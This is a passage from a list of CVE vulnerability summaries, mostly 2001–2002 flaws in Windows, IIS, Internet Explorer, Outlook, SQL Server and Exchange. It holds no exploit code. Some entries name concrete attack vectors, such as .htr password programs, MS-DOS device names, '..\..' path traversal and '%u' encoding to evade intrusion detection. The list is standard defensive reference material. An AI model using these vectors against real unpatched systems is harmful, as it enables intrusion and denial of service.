server to fail or run arbitrary code in the LocalSystem security context via an input field using an affected API. [CVE-2002-0576] ColdFusion 5.0 and earlier on Windows systems allows remote attackers to determine the absolute pathname of .cfm or .dbm files via an HTTP request that contains an MS-DOS device name such as NUL, which leaks the pathname in an error message. [CVE-2002-0507] An interaction between Microsoft Outlook Web Access (OWA) with RSA SecurID allows local users to bypass the SecurID authentication for a previous user via several submissions of an OWA Authentication request with the proper OWA password for the previous user, which is eventually accepted by OWA. [CVE-2002-0481] An interaction between Windows Media Player (WMP) and Outlook 2002 allows remote attackers to bypass Outlook security settings and execute Javascript via an IFRAME in an HTML email message that references .WMS (Windows Media Skin) or other WMP media files, whose onload handlers execute the player.LaunchURL() Javascript function. [CVE-2002-0421] IIS 4.0 allows local users to bypass the "User cannot change password" policy for Windows NT by directly calling .htr password changing programs in the /iisadmpwd directory, including (1) aexp2.htr, (2) aexp2b.htr, (3) aexp3.htr , or (4) aexp4.htr. [CVE-2002-0419] Information leaks in IIS 4 through 5.1 allow remote attackers to obtain potentially sensitive information or more easily conduct brute force attacks via responses from the server in which (2) in certain configurations, the server IP address is provided as the realm for Basic authentication, which could reveal real IP addresses that were obscured by NAT, or (3) when NTLM authentication is used, the NetBIOS name of the server and its Windows NT domain are revealed in response to an Authorization request. NOTE: this entry originally contained a vector (1) in which the server reveals whether it supports Basic or NTLM authentication through 401 Access Denied error messages. CVE has REJECTED this vector [CVE-2002-0409] orderdetails.aspx, as made available to Microsoft .NET developers as example code and demonstrated on www.ibuyspystore.com, allows remote attackers to view the orders of other users by modifying the OrderID parameter. [CVE-2002-0371] Buffer overflow in gopher client for Microsoft Internet Explorer 5.1 through 6.0, Proxy Server 2.0, or ISA Server 2000 allows remote attackers to execute arbitrary code via a gopher:// URL that redirects the user to a real or simulated gopher server that sends a long response. [CVE-2002-0368] The Store Service in Microsoft Exchange 2000 allows remote attackers to cause a denial of service (CPU consumption) via a mail message with a malformed RFC message attribute, aka "Malformed Mail Attribute can Cause Exchange 2000 to Exhaust CPU Resources." [CVE-2002-0367] smss.exe debugging subsystem in Windows NT and Windows 2000 does not properly authenticate programs that connect to other programs, which allows local users to gain administrator or SYSTEM privileges by duplicating a handle to a privileged process, as demonstrated by DebPloit. [CVE-2002-0366] Buffer overflow in Remote Access Service (RAS) phonebook for Windows NT 4.0, 2000, XP, and Routing and Remote Access Server (RRAS) allows local users to execute arbitrary code by modifying the rasphone.pbk file to use a long dial-up entry. [CVE-2002-0340] Windows Media Player (WMP) 8.00.00.4477, and possibly other versions, automatically detects and executes .wmf and other content, even when the file's extension or content type does not specify .wmf, which could make it easier for attackers to conduct unauthorized activities via Trojan horse files containing .wmf content. [CVE-2002-0314] fasttrack p2p, as used in (1) KaZaA before 1.5, (2) grokster, and (3) morpheus allows remote attackers to cause a denial of service (memory exhaustion) via a series of client-to-client messages, which pops up new windows per message. [CVE-2002-0285] Outlook Express 5.5 and 6.0 on Windows treats a carriage return ("CR") in a message header as if it were a valid carriage return/line feed combination (CR/LF), which could allow remote attackers to bypass virus protection and or other filtering mechanisms via a mail message with headers that only contain the CR, which causes Outlook to create separate headers. [CVE-2002-0283] Windows XP with port 445 open allows remote attackers to cause a denial of service (CPU consumption) via a flood of TCP SYN packets containing possibly malformed data. [CVE-2002-0249] PHP for Windows, when installed on Apache 2.0.28 beta as a standalone CGI module, allows remote attackers to obtain the physical path of the php.exe via a request with malformed arguments such as /123, which leaks the pathname in the error message. [CVE-2002-0228] Microsoft MSN Messenger allows remote attackers to use Javascript that references an ActiveX object to obtain sensitive information such as display names and web site navigation, and possibly more when the user is connected to certain Microsoft sites (or DNS-spoofed sites). [CVE-2002-0208] PGP Security PGPfire 7.1 for Windows alters the system's TCP/IP stack and modifies packets in ICMP error messages in a way that allows remote attackers to determine that the system is running PGPfire. [CVE-2002-0201] Cyberstop Web Server for Windows 0.1 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long HTTP GET request, possibly triggering a buffer overflow. [CVE-2002-0200] Cyberstop Web Server for Windows 0.1 allows remote attackers to cause a denial of service via an HTTP request for an MS-DOS device name. [CVE-2002-0193] Microsoft Internet Explorer 5.01 and 6.0 allow remote attackers to execute arbitrary code via malformed Content-Disposition and Content-Type header fields that cause the application for the spoofed file type to pass the file back to the operating system for handling rather than raise an error message, aka the first variant of the "Content Disposition" vulnerability. [CVE-2002-0191] Microsoft Internet Explorer 5.01, 5.5 and 6.0 allows remote attackers to view arbitrary files that contain the "{" character via script containing the cssText property of the stylesheet object, aka "Local Information Disclosure through HTML Object" vulnerability. [CVE-2002-0190] Microsoft Internet Explorer 5.01, 5.5 and 6.0 allows remote attackers to execute arbitrary code under fewer security restrictions via a malformed web page that requires NetBIOS connectivity, aka "Zone Spoofing through Malformed Web Page" vulnerability. [CVE-2002-0188] Microsoft Internet Explorer 5.01 and 6.0 allow remote attackers to execute arbitrary code via malformed Content-Disposition and Content-Type header fields that cause the application for the spoofed file type to pass the file back to the operating system for handling rather than raise an error message, aka the second variant of the "Content Disposition" vulnerability. [CVE-2002-0187] Cross-site scripting vulnerability in the SQLXML component of Microsoft SQL Server 2000 allows an attacker to execute arbitrary script via the root parameter as part of an XML SQL query, aka "Script Injection via XML Tag." [CVE-2002-0186] Buffer overflow in the SQLXML ISAPI extension of Microsoft SQL Server 2000 allows remote attackers to execute arbitrary code via data queries with a long content-type parameter, aka "Unchecked Buffer in SQLXML ISAPI Extension." [CVE-2002-0160] The administration function in Cisco Secure Access Control Server (ACS) for Windows, 2.6.x and earlier and 3.x through 3.01 (build 40), allows remote attackers to read HTML, Java class, and image files outside the web root via a ..\.. (modified ..) in the URL to port 2002. [CVE-2002-0159] Format string vulnerability in the administration function in Cisco Secure Access Control Server (ACS) for Windows, 2.6.x and earlier and 3.x through 3.01 (build 40), allows remote attackers to crash the CSADMIN module only (denial of service of administration function) or execute arbitrary code via format strings in the URL to port 2002. [CVE-2002-0155] Buffer overflow in Microsoft MSN Chat ActiveX Control, as used in MSN Messenger 4.5 and 4.6, and Exchange Instant Messenger 4.5 and 4.6, allows remote attackers to execute arbitrary code via a long ResDLL parameter in the MSNChat OCX. [CVE-2002-0154] Buffer overflows in extended stored procedures for Microsoft SQL Server 7.0 and 2000 allow remote attackers to cause a denial of service or execute arbitrary code via a database query with certain long arguments. [CVE-2002-0152] Buffer overflow in various Microsoft applications for Macintosh allows remote attackers to cause a denial of service (crash) or execute arbitrary code by invoking the file:// directive with a large number of / characters, which affects Internet Explorer 5.1, Outlook Express 5.0 through 5.0.2, Entourage v. X and 2001, PowerPoint v. X, 2001, and 98, and Excel v. X and 2001 for Macintosh. [CVE-2002-0147] Buffer overflow in the ASP data transfer mechanism in Internet Information Server (IIS) 4.0, 5.0, and 5.1 allows remote attackers to cause a denial of service or execute code, aka "Microsoft-discovered variant of Chunked Encoding buffer overrun." [CVE-2002-0142] CGI handler in John Roy Pi3Web for Windows 2.0 beta 1 and 2 allows remote attackers to cause a denial of service (crash) via a series of requests whose physical path is exactly 260 characters long and ends in a series of . (dot) characters. [CVE-2002-0101] Microsoft Internet Explorer 6.0 and earlier allows local users to cause a denial of service via an infinite loop for modeless dialogs showModelessDialog, which causes CPU usage while the focus for the dialog is not released. [CVE-2002-0078] The zone determination function in Microsoft Internet Explorer 5.5 and 6.0 allows remote attackers to run scripts in the Local Computer zone by embedding the script in a cookie, aka the "Cookie-based Script Execution" vulnerability. [CVE-2002-0077] Microsoft Internet Explorer 5.01, 5.5 and 6.0 treats objects invoked on an HTML page with the codebase property as part of Local Computer zone, which allows remote attackers to invoke executables present on the local system through objects such as the popup object, aka the "Local Executable Invocation via Object tag" vulnerability. [CVE-2002-0076] Java Runtime Environment (JRE) Bytecode Verifier allows remote attackers to escape the Java sandbox and execute commands via an applet containing an illegal cast operation, as seen in (1) Microsoft VM build 3802 and earlier as used in Internet Explorer 4.x and 5.x, (2) Netscape 6.2.1 and earlier, and possibly other implementations that use vulnerable versions of SDK or JDK, aka a variant of the "Virtual Machine Verifier" vulnerability. [CVE-2002-0070] Buffer overflow in Windows Shell (used as the Windows Desktop) allows local and possibly remote attackers to execute arbitrary code via a custom URL handler that has not been removed for an application that has been improperly uninstalled. [CVE-2002-0065] Funk Software Proxy Host 3.x uses weak encryption for the Proxy Host password, which allows local users to gain privileges by recovering the passwords from the PHOST.INI file or the Windows registry. [CVE-2002-0058] Vulnerability in Java Runtime Environment (JRE) allows remote malicious web sites to hijack or sniff a web client's sessions, when an HTTP proxy is being used, via a Java applet that redirects the session to another server, as seen in (1) Netscape 6.0 through 6.1 and 4.79 and earlier, (2) Microsoft VM build 3802 and earlier as used in Internet Explorer 4.x and 5.x, and possibly other implementations that use vulnerable versions of SDK or JDK. [CVE-2002-0057] XMLHTTP control in Microsoft XML Core Services 2.6 and later does not properly handle IE Security Zone settings, which allows remote attackers to read arbitrary files by specifying a local file as an XML Data Source. [CVE-2002-0053] Buffer overflow in SNMP agent service in Windows 95/98/98SE, Windows NT 4.0, Windows 2000, and Windows XP allows remote attackers to cause a denial of service or execute arbitrary code via a malformed management request. NOTE: this candidate may be split or merged with other candidates. This and other PROTOS-related candidates, especially CVE-2002-0012 and CVE-2002-0013, will be updated when more accurate information is available. [CVE-2002-0051] Windows 2000 allows local users to prevent the application of new group policy settings by opening Group Policy files with exclusive-read access. [CVE-2002-0050] Buffer overflow in AuthFilter ISAPI filter on Microsoft Commerce Server 2000 allows remote attackers to execute arbitrary code via long authentication data. [CVE-2002-0049] Microsoft Exchange Server 2000 System Attendant gives "Everyone" group privileges to the WinReg key, which could allow remote attackers to read or modify registry keys. [CVE-2002-0021] Network Product Identification (PID) Checker in Microsoft Office v. X for Mac allows remote attackers to cause a denial of service (crash) via a malformed product announcement. [CVE-2002-0020] Buffer overflow in telnet server in Windows 2000 and Interix 2.2 allows remote attackers to execute arbitrary code via malformed protocol options. [CVE-2001-1573] Buffer overflow in smtpscan.dll for Trend Micro InterScan VirusWall 3.51 for Windows NT has allows remote attackers to execute arbitrary code via a certain configuration parameter. [CVE-2001-1571] The Remote Desktop client in Windows XP sends the most recent user account name in cleartext, which could allow remote attackers to obtain terminal server user account names via sniffing. [CVE-2001-1570] Windows XP with fast user switching and account lockout enabled allows local users to deny user account access by setting the fast user switch to the same user (self) multiple times, which causes other accounts to be locked out. [CVE-2001-1560] Win32k.sys (aka Graphics Device Interface (GDI)) in Windows 2000 and XP allows local users to cause a denial of service (system crash) by calling the ShowWindow function after receiving a WM_NCCREATE message. [CVE-2001-1552] ssdpsrv.exe in Windows ME allows remote attackers to cause a denial of service by sending multiple newlines in a Simple Service Discovery Protocol (SSDP) message. NOTE: multiple replies to the original post state that the problem could not be reproduced. [CVE-2001-1549] Tiny Personal Firewall 1.0 and 2.0 allows local users to bypass filtering via non-standard TCP packets created with non-Windows protocol adapters. [CVE-2001-1548] ZoneAlarm 2.1 through 2.6 and ZoneAlarm Pro 2.4 and 2.6 allows local users to bypass filtering via non-standard TCP packets created with non-Windows protocol adapters. [CVE-2001-1533] DISPUTED * Microsoft Internet Security and Acceleration (ISA) Server 2000 allows remote attackers to cause a denial of service via a flood of fragmented UDP packets. NOTE: the vendor disputes this issue, saying that it requires high bandwidth to exploit, and the server does not experience any instability. Therefore this "laws of physics" issue might not be included in CVE. [CVE-2001-1519] DISPUTED RunAs (runas.exe) in Windows 2000 allows local users to create a spoofed named pipe when the service is stopped, then capture cleartext usernames and passwords when clients connect to the service. NOTE: the vendor disputes this issue, saying that administrative privileges are already required to exploit it. [CVE-2001-1518] RunAs (runas.exe) in Windows 2000 only creates one session instance at a time, which allows local users to cause a denial of service (RunAs hang) by creating a named pipe session with the authentication server without any request for service. NOTE: the vendor disputes this vulnerability, however the vendor also presents a scenario in which other users could be affected if running on a Terminal Server. Therefore this is a vulnerability. [CVE-2001-1517] DISPUTED RunAs (runas.exe) in Windows 2000 stores cleartext authentication information in memory, which could allow attackers to obtain usernames and passwords by executing a process that is allocated the same memory page after termination of a RunAs command. NOTE: the vendor disputes this issue, saying that administrative privileges are already required to exploit it, and the original researcher did not respond to requests for additional information. [CVE-2001-1515] Macintosh clients, when using NT file system volumes on Windows 2000 SP1, create subdirectories and automatically modify the inherited NTFS permissions, which may cause the directories to have less restrictive permissions than intended. [CVE-2001-1514] ColdFusion 4.5 and 5, when running on Windows with the advanced security sandbox type set to "operating system," does not properly pass security context to (1) child processes created with <CFEXECUTE> and (2) child processes that call the CreateProcess function and are executed with <CFOBJECT> or end with the CFX extension, which allows attackers to execute programs with the permissions of the System account. [CVE-2001-1497] Microsoft Internet Explorer 4.0 through 6.0 could allow local users to differentiate between alphanumeric and non-alphanumeric characters used in a password by pressing certain control keys that jump between non-alphanumeric characters, which makes it easier to conduct a brute-force password guessing attack. [CVE-2001-1489] Microsoft Internet Explorer 6 allows remote attackers to cause a denial of service (CPU consumption and memory leak) via a web page with a large number of images. [CVE-2001-1462] WebID in RSA Security SecurID 5.0 as used by ACE/Agent for Windows, Windows NT and Windows 2000 allows attackers to cause the WebID agent to enter debug mode via a URL containing null characters, which may allow attackers to obtain sensitive information. [CVE-2001-1461] Directory traversal vulnerability in WebID in RSA Security SecurID 5.0 as used by ACE/Agent for Windows, Windows NT and Windows 2000 allows attackers to access restricted resources via URL-encoded (1) /.. or (2) \.. sequences. [CVE-2001-1452] By default, DNS servers on Windows NT 4.0 and Windows 2000 Server cache glue records received from non-delegated name servers, which allows remote attackers to poison the DNS cache via spoofed DNS responses. [CVE-2001-1450] Microsoft Internet Explorer 5.0 through 6.0 allows attackers to cause a denial of service (browser crash) via a crafted FTP URL such as "/.#./". [CVE-2001-1410] Internet Explorer 6 and earlier allows remote attackers to create chromeless windows using the Javascript window.createPopup method, which could allow attackers to simulate a victim's display and conduct unauthorized activities or steal sensitive data via social engineering. [CVE-2001-1347] Windows 2000 allows local users to cause a denial of service and possibly gain privileges by setting a hardware breakpoint that is handled using global debug registers, which could cause other processes to terminate due to an exception, and allow hijacking of resources such as named pipes. [CVE-2001-1342] Apache before 1.3.20 on Windows and OS/2 systems allows remote attackers to cause a denial of service (GPF) via an HTTP request for a URI that contains a large number of / (slash) or other characters, which causes certain functions to dereference a null pointer. [CVE-2001-1326] Eudora 5.1 allows remote attackers to execute arbitrary code when the "Use Microsoft Viewer" option is enabled and the "allow executables in HTML content" option is disabled, via an HTML email with a form that is activated from an image that the attacker spoofs as a link, which causes the user to execute the form and access embedded attachments. [CVE-2001-1325] Internet Explorer 5.0 and 5.5, and Outlook Express 5.0 and 5.5, allow remote attackers to execute scripts when Active Scripting is disabled by including the scripts in XML stylesheets (XSL) that are referenced using an IFRAME tag, possibly due to a vulnerability in Windows Scripting Host (WSH). [CVE-2001-1319] Microsoft Exchange 5.5 2000 allows remote attackers to cause a denial of service (hang) via exceptional BER encodings for the LDAP filter type field, as demonstrated by the PROTOS LDAPv3 test suite. [CVE-2001-1302] The change password option in the Windows Security interface for Windows 2000 allows attackers to use the option to attempt to change passwords of other users on other systems or identify valid accounts by monitoring error messages, possibly due to a problem in the NetuserChangePassword function. [CVE-2001-1288] Windows 2000 and Windows NT allows local users to cause a denial of service (reboot) by executing a command at the command prompt and pressing the F7 and enter keys several times while the command is executing, possibly related to an exception handling error in csrss.exe. [CVE-2001-1243] Scripting.FileSystemObject in asp.dll for Microsoft IIS 4.0 and 5.0 allows local or remote attackers to cause a denial of service (crash) via (1) creating an ASP program that uses Scripting.FileSystemObject to open a file with an MS-DOS device name, or (2) remotely injecting the device name into ASP programs that internally use Scripting.FileSystemObject. [CVE-2001-1238] Task Manager in Windows 2000 does not allow local users to end processes with uppercase letters named (1) winlogon.exe, (2) csrss.exe, (3) smss.exe and (4) services.exe via the Process tab which could allow local users to install Trojan horses that cannot be stopped with the Task Manager. [CVE-2001-1219] Microsoft Internet Explorer 6.0 and earlier allows malicious website operators to cause a denial of service (client crash) via JavaScript that continually refreshes the window via self.location. [CVE-2001-1218] Microsoft Internet Explorer for Unix 5.0SP1 allows local users to possibly cause a denial of service (crash) in CDE or the X server on Solaris 2.6 by rapidly scrolling Chinese characters or maximizing the window. [CVE-2001-1192] Citrix Independent Computing Architecture (ICA) Client for Windows 6.1 allows remote malicious web sites to execute arbitrary code via a .ICA file, which is downloaded and automatically executed by the client. [CVE-2001-1186] Microsoft IIS 5.0 allows remote attackers to cause a denial of service via an HTTP request with a content-length value that is larger than the size of the request, which prevents IIS from timing out the connection. [CVE-2001-1122] Windows NT 4.0 SP 6a allows a local user with write access to winnt/system32 to cause a denial of service (crash in lsass.exe) by running the NT4ALL exploit program in 'SPECIAL' mode. [CVE-2001-1116] Identix BioLogon 2.03 and earlier does not lock secondary displays on a multi-monitor system running Windows 98 or ME, which allows an attacker with physical access to the system to bypass authentication through a secondary display. [CVE-2001-1099] The default configuration of Norton AntiVirus for Microsoft Exchange 2000 2.x allows remote attackers to identify the recipient's INBOX file path by sending an email with an attachment containing malicious content, which includes the path in the rejection notice. [CVE-2001-1088] Microsoft Outlook 8.5 and earlier, and Outlook Express 5 and earlier, with the "Automatically put people I reply to in my address book" option enabled, do not notify the user when the "Reply-To" address is different than the "From" address, which could allow an untrusted remote attacker to spoof legitimate addresses and intercept email from the client that is intended for another user. [CVE-2001-0986] SQLQHit.asp sample file in Microsoft Index Server 2.0 allows remote attackers to obtain sensitive information such as the physical path, file attributes, or portions of source code by directly calling sqlqhit.asp with a CiScope parameter set to (1) webinfo, (2) extended_fileinfo, (3) extended_webinfo, or (4) fileinfo. [CVE-2001-0951] Windows 2000 allows remote attackers to cause a denial of service (CPU consumption) by flooding Internet Key Exchange (IKE) UDP port 500 with packets that contain a large number of dot characters. [CVE-2001-0919] Internet Explorer 5.50.4134.0100 on Windows ME with "Prompt to allow cookies to be stored on your machine" enabled does not warn a user when a cookie is set using Javascript. [CVE-2001-0902] Microsoft IIS 5.0 allows remote attackers to spoof web log entries via an HTTP request that includes hex-encoded newline or form-feed characters. [CVE-2001-0877] Universal Plug and Play (UPnP) on Windows 98, 98SE, ME, and XP allows remote attackers to cause a denial of service via (1) a spoofed SSDP advertisement that causes the client to connect to a service on another machine that generates a large amount of traffic (e.g., chargen), or (2) via a spoofed SSDP announcement to broadcast or multicast addresses, which could cause all UPnP clients to send traffic to a single target system. [CVE-2001-0876] Buffer overflow in Universal Plug and Play (UPnP) on Windows 98, 98SE, ME, and XP allows remote attackers to execute arbitrary code via a NOTIFY directive with a long Location URL. [CVE-2001-0860] Terminal Services Manager MMC in Windows 2000 and XP trusts the Client Address (IP address) that is provided by the client instead of obtaining it from the packet headers, which allows clients to spoof their public IP address, e.g. through a Network Address Translation (NAT). [CVE-2001-0845] Vulnerability in DECwindows Motif Server on OpenVMS VAX or Alpha 6.2 through 7.3, and SEVMS VAX or Alpha 6.2, allows local users to gain access to unauthorized resources. [CVE-2001-0791] Trend Micro InterScan VirusWall for Windows NT allows remote attackers to make configuration changes by directly calling certain CGI programs, which do not restrict access. [CVE-2001-0729] Apache 1.3.20 on Windows servers allows remote attackers to bypass the default index page and list directory contents via a URL with a large number of / (slash) characters. [CVE-2001-0726] Outlook Web Access (OWA) in Microsoft Exchange 5.5 Server, when used with Internet Explorer, does not properly detect certain inline script, which can allow remote attackers to perform arbitrary actions on a user's Exchange mailbox via an HTML e-mail message. [CVE-2001-0721] Universal Plug and Play (UPnP) in Windows 98, 98SE, ME, and XP allows remote attackers to cause a denial of service (memory consumption or crash) via a malformed UPnP request. [CVE-2001-0718] Vulnerability in (1) Microsoft Excel 2002 and earlier and (2) Microsoft PowerPoint 2002 and earlier allows attackers to bypass macro restrictions and execute arbitrary commands by modifying the data stream in the document. [CVE-2001-0709] Microsoft IIS 4.0 and before, when installed on a FAT partition, allows a remote attacker to obtain source code of ASP files via a URL encoded with Unicode. [CVE-2001-0687] Broker FTP server 5.9.5 for Windows NT and 9x allows a remote attacker to retrieve privileged web server system information by (1) issuing a CD command (CD C:) followed by the LS command, (2) specifying arbitrary paths in the UNC format (\\computername\sharename). [CVE-2001-0678] A buffer overflow in reggo.dll file used by Trend Micro InterScan VirusWall prior to 3.51 build 1349 for Windows NT 3.5 and InterScan WebManager 1.2 allows a local attacker to execute arbitrary code. [CVE-2001-0675] Rit Research Labs The Bat! 1.51 for Windows allows a remote attacker to cause a denial of service by sending an email to a user's account containing a carrage return <CR> that is not followed by a line feed <LF>. [CVE-2001-0669] Various Intrusion Detection Systems (IDS) including (1) Cisco Secure Intrusion Detection System, (2) Cisco Catalyst 6000 Intrusion Detection System Module, (3) Dragon Sensor 4.x, (4) Snort before 1.8.1, (5) ISS RealSecure Network Sensor 5.x and 6.x before XPU 3.2, and (6) ISS RealSecure Server Sensor 5.5 and 6.0 for Windows, allow remote attackers to evade detection of HTTP attacks via non-standard "%u" Unicode encoding of ASCII characters in the requested URL. [CVE-2001-0666] Outlook Web Access (OWA) in Microsoft Exchange 2000 allows an authenticated user to cause a denial of service (CPU consumption) via a malformed OWA request for a deeply nested folder within the user's mailbox. [CVE-2001-0663] Terminal Server in Windows NT and Windows 2000 allows remote attackers to cause a denial of service via a sequence of invalid Remote Desktop Protocol (RDP) packets. [CVE-2001-0662] RPC endpoint mapper in Windows NT 4.0 allows remote attackers to cause a denial of service (loss of RPC services) via a malformed request. [CVE-2001-0660] Outlook Web Access (OWA) in Microsoft Exchange 5.5, SP4 and earlier, allows remote attackers to identify valid user email addresses by directly accessing a back-end function that processes the global address list (GAL). [CVE-2001-0659] Buffer overflow in IrDA driver providing infrared data exchange on Windows 2000 allows attackers who are physically close to the machine to cause a denial of service (reboot) via a malformed IrDA packet. [CVE-2001-0658] Cross-site scripting (CSS) vulnerability in Microsoft Internet Security and Acceleration (ISA) Server 2000 allows remote attackers to cause other clients to execute certain script or read cookies via malicious script in an invalid URL that is not properly quoted in an error message. [CVE-2001-0628] Microsoft Word 2000 does not check AutoRecovery (.asd) files for macros, which allows a local attacker to execute arbitrary macros with the user ID of the Word user. [CVE-2001-0547] Memory leak in the proxy service in Microsoft Internet Security and Acceleration (ISA) Server 2000 allows local attackers to cause a denial of service (resource exhaustion). [CVE-2001-0546] Memory leak in H.323 Gatekeeper Service in Microsoft Internet Security and Acceleration (ISA) Server 2000 allows remote attackers to cause a denial of service (resource exhaustion) via a large amount of malformed H.323 data. [CVE-2001-0543] Memory leak in NNTP service in Windows NT 4.0 and Windows 2000 allows remote attackers to cause a denial of service (memory exhaustion) via a large number of malformed posts. [CVE-2001-0542] Buffer overflows in Microsoft SQL Server 7.0 and 2000 allow attackers with access to SQL Server to execute arbitrary code through the functions (1) raiserror, (2) formatmessage, or (3) xp_sprintf. NOTE: the C runtime format string vulnerability reported in MS01-060 is identified by CVE-2001-0879. [CVE-2001-0540] Memory leak in Terminal servers in Windows NT and Windows 2000 allows remote attackers to cause a denial of service (memory exhaustion) via a large number of malformed Remote Desktop Protocol (RDP) requests to port 3389. [CVE-2001-0538] Microsoft Outlook View ActiveX Control in Microsoft Outlook 2002 and earlier allows remote attackers to execute arbitrary commands via a malicious HTML e-mail message or web page. [CVE-2001-0513] Oracle listener process on Windows NT redirects connection requests to another port and creates a separate thread to process the request, which allows remote attackers to cause a denial of service by repeatedly connecting to the Oracle listener but not connecting to the redirected port. [CVE-2001-0505] Multiple memory leaks in Microsoft Services for Unix 2.0 allow remote attackers to cause a denial of service (memory exhaustion) via a large number of malformed requests to (1) the Telnet service, or (2) the NFS service. [CVE-2001-0503] Microsoft NetMeeting 3.01 with Remote Desktop Sharing enabled allows remote attackers to cause a denial of service via a malformed string to the NetMeeting service port, aka a variant of the "NetMeeting Desktop Sharing" vulnerability. [CVE-2001-0502] Running Windows 2000 LDAP Server over SSL, a function does not properly check the permissions of a user request when the directory principal is a domain user and the data attribute is the domain password, which allows local users to modify the login password of other users. [CVE-2001-0501] Microsoft Word 2002 and earlier allows attackers to automatically execute macros without warning the user by embedding the macros in a manner that escapes detection by the security scanner. [CVE-2001-0382] Computer Associates CCC\Harvest 5.0 for Windows NT/2000 uses weak encryption for passwords, which allows a remote attacker to gain privileges on the application. [CVE-2001-0373] The default configuration of the Dr. Watson program in Windows NT and Windows 2000 generates user.dmp crash dump files with world-readable permissions, which could allow a local user to gain access to sensitive information. [CVE-2001-0365] Eudora before 5.1 allows a remote attacker to execute arbitrary code, when the 'Use Microsoft Viewer' and 'allow executables in HTML content' options are enabled, via an HTML email message containing Javascript, with ActiveX controls and malicious code within IMG tags. [CVE-2001-0364] SSH Communications Security sshd 2.4 for Windows allows remote attackers to create a denial of service via a large number of simultaneous connections. [CVE-2001-0344] An SQL query method in Microsoft SQL Server 2000 Gold and 7.0 using Mixed Mode allows local database users to gain privileges by reusing a cached connection of the sa administrator account. [CVE-2001-0341] Buffer overflow in Microsoft Visual Studio RAD Support sub-component of FrontPage Server Extensions allows remote attackers to execute arbitrary commands via a long registration request (URL) to fp30reg.dll. [CVE-2001-0340] An interaction between the Outlook Web Access (OWA) service in Microsoft Exchange 2000 Server and Internet Explorer allows attackers to execute malicious script code against a user's mailbox via a message attachment that contains HTML code, which is executed automatically. [CVE-2001-0337] The Microsoft MS01-014 and MS01-016 patches for IIS 5.0 and earlier introduce a memory leak which allows attackers to cause a denial of service via a series of requests. [CVE-2001-0336] The Microsoft MS00-060 patch for IIS 5.0 and earlier introduces an error which allows attackers to cause a denial of service via a malformed request. [CVE-2001-0324] Windows 98 and Windows 2000 Java clients allow remote attackers to cause a denial of service via a Java applet that opens a large number of UDP sockets, which prevents the host from establishing any additional UDP connections, and possibly causes a crash. [CVE-2001-0281] Format string vulnerability in DbgPrint function, used in debug messages for some Windows NT drivers (possibly when called through DebugMessage), may allow local users to gain privileges. [CVE-2001-0265] ASCII Armor parser in Windows PGP 7.0.3 and earlier allows attackers to create files in arbitrary locations via a malformed ASCII armored file. [CVE-2001-0244] Buffer overflow in Microsoft Index Server 2.0 allows remote attackers to execute arbitrary commands via a long search parameter. [CVE-2001-0243] Windows Media Player 7 and earlier stores Internet shortcuts in a user's Temporary Files folder with a fixed filename instead of in the Internet Explorer cache, which causes the HTML in those shortcuts to run in the Local Computer Zone instead of the Internet Zone, which allows remote attackers to read certain files. [CVE-2001-0241] Buffer overflow in Internet Printing ISAPI extension in Windows 2000 allows remote attackers to gain root privileges via a long print request that is passed to the extension through IIS 5.0. [CVE-2001-0240] Microsoft Word before Word 2002 allows attackers to automatically execute macros without warning the user via a Rich Text Format (RTF) document that links to a template with the embedded macro. [CVE-2001-0239] Microsoft Internet Security and Acceleration (ISA) Server 2000 Web Proxy allows remote attackers to cause a denial of service via a long web request with a specific type. [CVE-2001-0238] Microsoft Data Access Component Internet Publishing Provider 8.103.2519.0 and earlier allows remote attackers to bypass Security Zone restrictions via WebDAV requests. [CVE-2001-0237] Memory leak in Microsoft 2000 domain controller allows remote attackers to cause a denial of service by repeatedly connecting to the Kerberos service and then disconnecting without sending any data. [CVE-2001-0191] gnuserv before 3.12, as shipped with XEmacs, does not properly check the specified length of an X Windows MIT-MAGIC-COOKIE cookie, which allows remote attackers to execute arbitrary commands via a buffer overflow, or brute force authentication by using a short cookie length. [CVE-2001-0152] The password protection option for the Compressed Folders feature in Plus! for Windows 98 and Windows Me writes password information to a file, which allows local users to recover the passwords and read the compressed folders. [CVE-2001-0149] Windows Scripting Host in Internet Explorer 5.5 and earlier allows remote attackers to read arbitrary files via the GetObject Javascript function and the htmlfile ActiveX object. [CVE-2001-0148] The WMP ActiveX Control in Windows Media Player 7 allows remote attackers to execute commands in Internet Explorer via javascript URLs, a variant of the "Frame Domain Verification" vulnerability. [CVE-2001-0147] Buffer overflow in Windows 2000 event viewer snap-in allows attackers to execute arbitrary commands via a malformed field that is improperly handled during the detailed view of event records. [CVE-2001-0146] IIS 5.0 and Microsoft Exchange 2000 allow remote attackers to cause a denial of service (memory allocation error) by repeatedly sending a series of specially formatted URL's. [CVE-2001-0137] Windows Media Player 7 allows remote attackers to execute malicious Java applets in Internet Explorer clients by enclosing the applet in a skin file named skin.wmz, then referencing that skin in the codebase parameter to an applet tag, aka the Windows Media Player Skins File Download" vulnerability. [CVE-2001-0083] Windows Media Unicast Service in Windows Media Services 4.0 and 4.1 does not properly shut down some types of connections, producing a memory leak that allows remote attackers to cause a denial of service via a series of severed connections, aka the "Severed Windows Media Server Connection" vulnerability. [CVE-2001-0048] The "Configure Your Server" tool in Microsoft 2000 domain controllers installs a blank password for the Directory Service Restore Mode, which allows attackers with physical access to the controller to install malicious programs, aka the "Directory Service Restore Mode Password" vulnerability. [CVE-2001-0046] The default permissions for the SNMP Parameters registry key in Windows NT 4.0 allows remote attackers to read and possibly modify the SNMP community strings to obtain sensitive information or modify network configuration, aka one of the "Registry Permissions" vulnerabilities. [CVE-2001-0045] The default permissions for the RAS Administration key in Windows NT 4.0 allows local users to execute arbitrary commands by changing the value to point to a malicious DLL, aka one of the "Registry Permissions" vulnerabilities. [CVE-2001-0018] Windows 2000 domain controller in Windows 2000 Server, Advanced Server, or Datacenter Server allows remote attackers to cause a denial of service via a flood of malformed service requests. [CVE-2001-0017] Memory leak in PPTP server in Windows NT 4.0 allows remote attackers to cause a denial of service via a malformed data packet, aka the "Malformed PPTP Packet Stream" vulnerability. [CVE-2001-0015] Network Dynamic Data Exchange (DDE) in Windows 2000 allows local users to gain SYSTEM privileges via a "WM_COPYDATA" message to an invisible window that is running with the privileges of the WINLOGON process. [CVE-2001-0014] Remote Data Protocol (RDP) in Windows 2000 Terminal Service does not properly handle certain malformed packets, which allows remote attackers to cause a denial of service, aka the "Invalid RDP Data" vulnerability. [CVE-2001-0006] The Winsock2ProtocolCatalogMutex mutex in Windows NT 4.0 has inappropriate Everyone/Full Control permissions, which allows local users to modify the permissions to "No Access" and disable Winsock network connectivity to cause a denial of service, aka the 